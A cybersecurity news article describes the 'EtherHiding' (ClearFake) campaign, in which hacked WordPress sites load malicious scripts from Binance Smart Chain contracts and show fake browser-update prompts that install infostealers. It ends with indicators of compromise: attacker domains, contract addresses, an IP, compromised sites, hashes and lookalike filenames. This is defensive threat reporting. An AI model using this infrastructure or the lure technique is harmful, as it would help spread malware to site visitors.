Threat actors have employed a new technique to distribute malicious code named “EtherHiding,” which abuses Binance’s Smart Chain (BSC) contracts to host parts of a malicious code chain to hide them inside the blockchain.
To inject malicious JavaScript codes into the blockchain systems, threat actors used compromised WordPress sites redirected to Cloudflare Worker hosts to achieve evasive distribution.
“In the attack flow, a site is defaced with a very believable overlay demanding a browser update before the site can be accessed. The fake “update” turns out to be vicious infostealer malware like RedLine, Amadey, or Lumma.”, reads the post by Guardio Labs.
Document
Why API Security Should be Your Top Priority
API security isn’t just a priority; it’s the lifeline of businesses and organizations. Yet, this interconnectivity brings with it an array of vulnerabilities that are often concealed beneath the surface.
EtherHiding Malware
This new technique has also been termed “ClearFake,” which distributes malicious codes through compromised websites by displaying fake browser update overlays.
According to the reports shared with Cyber Security News, it was confirmed that threat actors have been targeting vulnerable WordPress websitesto inject two malicious scripts into the web pages.
These malicious scripts load the Binance Smart Chain (BSC) JS library, which fetches other malicious scripts from the blockchain that are injected into the site. Moreover, this code also triggers the download of the third-stage payload from the attacker-controlled server (C2).
Compromised Website
The fake browser update overlays are prompted for Google Chrome, Microsoft Edge, or Mozilla Firefox browser users. When the victims click the “ update ” button, they are directed to download a malicious executable from Dropbox or other legitimate websites.
Blockchain technology, while being a powerful tool, can also be exploited in various ways, such as in the spread of malware or in the exfiltration of stolen data and files. These malicious activities can be difficult to track and shut down using traditional law enforcement methods.
A complete report about ClearFake has been published by Guardio Labs, providing detailed information about the distribution technique, exploitation methods, reason for Binance usage, and other information.
Indicators of Compromises (IOCs)
Related BSC Addresses/Contracts:———————————–0xfc1fE66FB63c542A3e4D45305DaB196E5EcA222A0x7f36D9292e7c70A204faCC2d255475A861487c603ed Stage IP Addresses:———————–109[.]248[.]206[.]493rd Stage Attacker Controlled Domains:————————————–921hapudyqwdvy[.]com98ygdjhdvuhj[.]comboiibzqmk12j[.]combookchrono8273[.]combpjoieohzmhegwegmmuew[.]onlinecczqyvuy812jdy[.]comindogevro22tevra[.]comioiubby73b1n[.]comkjniuby621edoo[.]comlminoeubybyvq[.]comnbvyrxry216vy[.]comnmbvcxzasedrt[.]comoekofkkfkoeefkefbnhgtrq[.]spaceoiouhvtybh291[.]comoiuugyfytvgb22h[.]comoiuytyfvq621mb[.]orgojhggnfbcy62[.]comopkfijuifbuyynyny[.]compklkknj89bygvczvi[.]compoqwjoemqzmemzgqegzqzf[.]onlinepwwqkppwqkezqer[.]sitereedx51mut[.]comsioaiuhsdguywqgyuhuiqw[.]orgug62r67uiijo2[.]comvcrwtttywuuidqioppn1[.]comvvooowkdqddcqcqcdqggggl[.]siteytntf5hvtn2vgcxxq[.]comzasexdrc13ftvg[.]comziucsugcbfyfbyccbasy[.]comCompromised WordPress Sites (Detected Last 14 Days):—————————————————-kprofiles[.]comanimexin[.]vipcoloredmanga[.]comgayvidsclub[.]comdailyangelprayers[.]nethealthella[.]comtechsprobe[.]comavionprivat[.]ro......–> 510 More Domains Here –> https://pastebin.com/x23iWvixMalware Hashes (samples):————————————d0c56875fb19a407a86292e35dffec6caabbdbf630fbb79de4eec04708fa7b6637bba90d20e429ce3fd56847e4e7aaf83c62fdd70a7dbdcd35b6f2569d47d533b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f1a99ac759fcd881729b76c2904476b4201e794df2d0547c954ea37be7c153131633124ed8d7af6dd22722ee43abfe9b0ad97798a1d48b951abdc1ad88e83c7023db1afee107cf2fa57d13e60c13c87dd1c22bfa9ef23dcf369d52dd9807a5ff41743f4a392b6d2ad0d47a7a57e277e1a29ecf459275b604919a6131739afdaad788567d3cc693dd5d0dada9f4e1421755c1d74257544ba12b502f085a620585e3d77b34ba6dbb49d594e2be590a87f682e1875d2565ff18bdeafc66c9d5594ea80f05865e59ec4e12e504adbf5fae3d706b5d27e5ab2fc52fcd0feb19365c7b0e041b3eaaed1c0ad37e7f91717ee5b0e12e922b67bbe1e69a4c68c80baf22b4f8ba53b5d773bc157df65fb0941c24e1edbc7c7b47e37b3f7a01751fc3b1a701a2ab315537510fc91d73825d0d6661e9f4b141799877e2f5159892886265f362eMalware Filename samples (Note UNICODE abuse in filenames):——————–ChrоmеSеtuр.appxChrоmеSеtuр.exeСhrоmеSеtup.exeChrоmеSеtuр.msiMlсrоsоftЕdgеSеtup.appxMlсrоsоftЕdgеSеtup.exeMlсrоsоftЕdgеSеtup.msiMlсrоsоftЕdgеSеtup.msixSetup_win64_2.49.0.4_release.exeSetup_win64_5.49.1031-release.exe Source: Guardio Labs
